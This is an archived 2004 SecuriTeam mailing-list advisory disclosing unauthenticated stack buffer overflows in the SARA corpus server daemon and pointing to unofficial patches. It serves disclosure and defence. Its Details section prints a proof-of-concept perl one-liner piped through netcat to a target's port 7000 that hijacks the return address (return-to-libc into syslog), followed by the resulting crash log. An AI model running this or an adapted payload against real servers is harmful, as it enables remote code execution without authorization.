[UNIX] SARAd Buffer Overflow Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 08/25/04
- Previous message: SecuriTeam: "[UNIX] JShop page.php Cross Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 25 Aug 2004 16:39:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SARAd Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.natcorp.ox.ac.uk/SARA/> SARA is a specialized software used
to serve the British National Corpus (BNC) content. The British National
Corpus is used by many linguists for research on the English language and
is licensed commercially by the BNC Consortium. The server software run on
various flavors of Unix and is freely available as source .
There are several buffer overflows present in the SARA server (SARAd), one
of which is exploitable allowing an attacker to execute arbitrary code on
the server.
DETAILS
Vulnerable Systems:
* SARA latest version, 16th April 2001
Successful exploitation of the buffer overflow will result in code
execution with the privileges of the SARA daemon, which should run in a
dedicated unprivileged account. However, most are using root privileges.
No authentication is required by the daemon and thus an attack is easy to
carry out.
The overflows are classic stack-based buffer overflows caused by
insufficient bounds checking, allowing the attacker to overwrite the
return address. The following perl snippet does a return-to-libc on Linux
2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():
perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
| netcat victim 7000
The output from this simple operation is:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string
SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority:
80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal
11
Patch Availability:
Although there is no official patch and the program is quite old, there
are two unofficial patches, one that should be suitable for all systems
and fixes the abovementioned bugs, and one that does the same and also
lets SARA daemon automatically chroot itself to the corpus directory and
drops rights to a specified account. The later will not compile on Windows
machine even though the server itself can be compiled on Windows.
You can get the patches, including fairly simple installation instructions
from
<http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz>
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz.
ADDITIONAL INFORMATION
The information has been provided by <mailto:Matthias.Bethke@gmx.net>
Matthias Bethke.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] JShop page.php Cross Site Scripting"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NEWS] SARA Cross-site Scripting Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... includes banners from the
service. ... In SARA version 4.2.7 and before, ... banner to be processed by the
administrative web browser. ... (Securiteam) - [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise
management system for large amounts of HP ... The web server is a modular service ...
HP Web JetAdmin uses it's own encryption. ... (Securiteam) - [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were
discovered in the (Oracle database server ... password is required to exploit this vulnerability.
... (Securiteam) - [NEWS] ColdFusion MX Oversize Error Message DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution
for building and deploying powerful web ... shoots up and stays there until the server
completes writing the error ... a long string of data as a GET or POST request to ...
(Securiteam) - [NT] F-Secure Internet Gatekeeper Content Scanning Server DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... " <http://www.f-secure.com/products/anti-virus/fsigk/>
F-Secure Internet ... the Content Scanner Server. ... The vendor has been
contacted and confirmed the existence of the problem ... (Securiteam)
